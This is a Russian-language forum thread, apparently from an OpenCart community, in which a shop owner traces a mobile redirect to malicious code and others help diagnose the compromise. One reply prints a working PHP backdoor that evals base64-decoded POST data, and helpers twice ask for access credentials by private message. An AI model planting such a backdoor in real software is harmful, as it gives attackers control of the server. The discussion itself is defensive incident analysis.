Jump to content
Sign in to follow this  
dexion

Похоже на сайт попал вирус

Recommended Posts

Доброй ночи всем.

Возникла следующая ситуация: при заходе на мой сайт ** с iPhone возникает необычная проблема (скрины во вложении). 

Действительно ли это вирус? Как с ним бороться?

 

 

*решено

post-675101-0-56368900-1392944577_thumb.jpg

post-675101-0-98666100-1392944577_thumb.jpg

Share this post


Link to post
Share on other sites

Вредоносное ПО установлено у вас на сервере. В этом нет никаких сомнений.

с вашего сайта происходит редирект на сайт злоумышленников.

 

Как бороться? В двух словах этого не описать. И тем более не зная всей картины.

 

Попробуйте обратиться с этой проблемой в "платные услуги".

Но только нужно понимать, что даже если вычистить всю нечисть, которая сейчас есть на сайте, то она может появиться снова если есть, например, на вашем хостинг-аккаунте сайты на вордпресс или джумле.  также возможна брешь у хостера и куча других банальностей (наличие паролей доступа у третьих лиц, кража ftp-паролей с вашего компьютера вирусом).

 

Это я пишу к тому, что нельзя гарантировать 100% безопасность сайта в дальнейшем даже после успешной зачистки сервера.

Share this post


Link to post
Share on other sites

Удалось решить проблему простым удалением вредоносного кода из .htaccess.

Возможно это только временное решение, посмотрим.

Share this post


Link to post
Share on other sites

Удалось решить проблему простым удалением вредоносного кода из .htaccess.

Возможно это только временное решение, посмотрим.

 

поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины.

код ведь не их воздуха возник сам по себе.

его туда внедрили.  когда перекроете дыру, только тогда можете говорить о решении проблемы.

 

У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД).

Share this post


Link to post
Share on other sites

шаблон купленый?  ;)

Share this post


Link to post
Share on other sites

Посмотрите в папку downloads, там тоже будет много вкусного!

Share this post


Link to post
Share on other sites

шаблон купленый?  ;)

нет, шаблон дефолтный

 

 

поверьте, это не решение проблемы. это лечение симптомов/последствий, а не причины.

код ведь не их воздуха возник сам по себе.

его туда внедрили.  когда перекроете дыру, только тогда можете говорить о решении проблемы.

 

У вас может быть уже шелл на сервере сидит и под его контролем весь аккаунт (все файлы, БД).

да, согласен. а может подскажете, каким образом можно обнаружить первоначальную причину всего этого? или наводку кинете. а то в интернете как то не особо много информации про поиск и лечение вирусов на опенкарте

 

 

Посмотрите в папку downloads, там тоже будет много вкусного!

спасибо, глянем

Share this post


Link to post
Share on other sites

Посмотрите в папку downloads, там тоже будет много вкусного!

в папке download лежат 4 файла http://prntscr.com/2uhwdp :

1) пустой index.php

2) и 3) для маркета

4) непонятно что это и откуда взялось, дата 17.02 относительно недавняя (с какого момента появился этот вирус не знаю, обнаружил только вчера случайно зайдя с телефона). содержание файла примерно следующее: http://prntscr.com/2uhxcr

можно ли считать 4й вариант причиной этой проблемы? 

Share this post


Link to post
Share on other sites

Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с  варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит  положение в поиске  найти лечение .  :ugeek:

Share this post


Link to post
Share on other sites

Это первый звоночек.Не факт что это только в папке Download.Вирус мог легко уже добраться до системных файлов.Где угодно.Среди контроллеров способов доставки-оплаты, ckeditor итд.Вспоминайте сколько дополнений для экономии вы установили с  варезников.Писать доктору , что вы ни с кем ни разу ,только усугубит  положение в поиске  найти лечение .   :ugeek:

 

Так в том то и дело, что вроде бы уже давненько никаких модулей не ставил. Доступ к фтп был у стороннего человека, но не думаю, что он как то причастен к этому, хотя все возможно. 

Share this post


Link to post
Share on other sites

Я бы не советовал вам удалять сейчас все подозрительные файлы, найденные вами.

В них может оказаться много полезной информации для опытного человека.

это как симптомы болезни для врача.

 

даже установленные права на эти файлы - это уже показатель.

 

у меня сейчас есть некоторое свободное время. если доверяете, то могу посмотреть на вашу проблему изнутри.

для этого нужны коды доступа (в личку, конечно).

Share this post


Link to post
Share on other sites
<?php
if(isset($_POST['execgate'])) {
	set_time_limit(0);ignore_user_abort(1);if(isset($_POST['action'])) {switch($_POST['action']) {case 'update': eval(base64_decode($_POST['file']));break;default: break;}}
}
?>

вот это довольно давно уже было на сайте.

ворота нараспашку.  т. е. кто угодно и когда угодно благодаря этой небольшой вставке мог запускать произвольный код и менять файлы как вздумается.

 

но до поры до времени никто не заходил через эти ворота.

Share this post


Link to post
Share on other sites

 

а может подскажете, каким образом можно обнаружить первоначальную причину всего этого?

анализируйте лог доступа по дате загрузки подозрительных файлов в папку dоwnload

Share this post


Link to post
Share on other sites

И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код.

 

встречались ли вы с таким подходом?

Share this post


Link to post
Share on other sites

А какая версия opencart у вас?

Потому что очень уж спокойно вам залили shell в папку download

Какие модули стоят и какие vqmod допилы?

Share this post


Link to post
Share on other sites

И довольно оригинально был обыгран момент, связанный с вредоносным кодом. Удаляешь этот код и получаешь кривые стили в админке. Т. е. сделано так, что при удалении вредоносного кода создается иллюзия, что вы удаляете нечто нужно и полезное, а поэтому возникает желание вернуть назад этот код.

 

встречались ли вы с таким подходом?

 

Стабильная тема. Плюс еще файлы назвать именами контроллеров и т.п.

Постоянно обнаруживаю файлы (в старых версиях) в папке download разного рода вредителей, только вот залить, еще не значит получить доступ к ним, так как они получают кодируемое имя. Это если ключ "дефолтный" как у всех в сборках, тогда можно получить контроль.

Share this post


Link to post
Share on other sites
А какая версия opencart у вас?

 

 

для меня определенная загадка почему была выбрана версия 1.5.4 Opencart (не 1.5.4.1 и не ocStore) для создания магазина в конце 2013.

Share this post


Link to post
Share on other sites

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

Share this post


Link to post
Share on other sites

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

а какой у вас хостинг? 

Share this post


Link to post
Share on other sites

Такая же фигня

переадресация с данным плеером на сайт люксут

причем на всех сайтах на аккаунте хостера

 

 

не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам.

 

Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах.  Назначают всем папкам права 777, например (так ведь быстрее движок установить!).

Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема.

Share this post


Link to post
Share on other sites

не удивительно, что на всех сайтах. взломан аккаунт, значит есть доступ ко всем сайтам.

 

Я, кстати, обращал неоднократное внимание сообщества (к заказчикам в первую очередь относится), что в защите не бывает мелочей. Но большинство исполнителей, как я вижу, просто напросто игнорируют основные правила безопасности на unix-хостингах.  Назначают всем папкам права 777, например (так ведь быстрее движок установить!).

Одна эта оплошность не критична, но когда такие оплошности суммируются, то может возникнуть проблема.

 

у меня не на всех папках права 777)))

только на 2-х

Share this post


Link to post
Share on other sites

у меня не на всех папках права 777)))

только на 2-х

 

 

у вас - да.  а у топикстартера, например, все 777, что весьма нехорошо.

 

В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются).  Через них ломают в первую очередь.

 

А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера.

хостинги у вас разные.

Share this post


Link to post
Share on other sites

у вас - да.  а у топикстартера, например, все 777, что весьма нехорошо.

 

В первую очередь проверьте сайты на вордпрессе и джумле (если таковые имеются).  Через них ломают в первую очередь.

 

А вообще интересно и ваш сайт посмотреть и сравнить. Может быть вас сломали тем же методом, каким был взломан сайт топикстартера.

хостинги у вас разные.

http://bestsantehnika.com/

Share this post


Link to post
Share on other sites

2c4and,  движки у вас разных версий, более того в одном случае opencart, в другом (вашем) - ocstore.

как вариант, дело в модулях, полученных из ненадежных источников.  но не обязательно.

 

Если скинете коды доступа в личку, то могу внимательнее посмотреть.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
You are posting as a guest. If you have an account, please sign in.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.